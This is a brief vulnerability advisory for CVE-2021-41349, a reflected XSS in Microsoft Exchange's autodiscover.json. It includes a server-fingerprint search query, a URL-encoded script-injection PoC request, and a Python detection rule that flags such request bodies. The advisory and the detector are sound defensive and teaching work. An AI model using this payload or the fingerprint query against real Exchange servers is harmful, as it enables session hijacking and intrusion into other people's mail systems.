Microsoft Exchange autodiscover.json Reflective XSS CVE-2021-41349
Vulnerability Description
A reflected XSS vulnerability exists in the Microsoft Exchange autodiscover.json file; it is caused by insufficient filtering.
Vulnerability Impact
Microsoft Exchange
Network Asset Search Query
icon_hash="1768726119"
Vulnerability Reproduction
Login page
Verification PoC
POST /autodiscover/autodiscover.json
%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1
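For detection, the check below flags POST requests to autodiscover.json whose body decodes to HTML markup, as the PoC body above does. It is an added example, not part of the original post. It assumes request records (method, target, body) come from a reverse proxy or WAF that captures request bodies; the function names and the benign sample records are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

TARGET_PATH = "/autodiscover/autodiscover.json"
# Any HTML tag opener or closer, e.g. "<script" or "</script"
TAG_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.IGNORECASE)


def normalise(body: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly until the text stops changing."""
    for _ in range(max_rounds):
        decoded = unquote_plus(body)
        if decoded == body:
            break
        body = decoded
    return body


def is_suspect(method: str, target: str, body: str) -> bool:
    """True for a POST to autodiscover.json whose body carries HTML markup."""
    if method.upper() != "POST":
        return False
    # Compare only the path, ignoring any query string and letter case.
    if urlsplit(target).path.lower() != TARGET_PATH:
        return False
    return TAG_RE.search(normalise(body)) is not None


# Constructed sample records: (method, request target, body).
# The first body is the PoC body shown on this page; the rest are benign.
SAMPLES = [
    ("POST", "/autodiscover/autodiscover.json",
     "%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1"),
    ("POST", "/autodiscover/autodiscover.json", "Protocol=ActiveSync&x=1"),
    ("GET", "/autodiscover/autodiscover.json?Protocol=ActiveSync", ""),
    ("POST", "/owa/auth.owa", "username=user%40example.com"),
]


def scan(records):
    """Return the records that match the detection rule."""
    return [r for r in records if is_suspect(*r)]


if __name__ == "__main__":
    for method, target, _ in scan(SAMPLES):
        print("suspect:", method, target)
```

Default IIS W3C logs do not record request bodies, so this rule needs a body-aware source such as a WAF or proxy capture.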
This post is licensed under CC BY 4.0 by the author.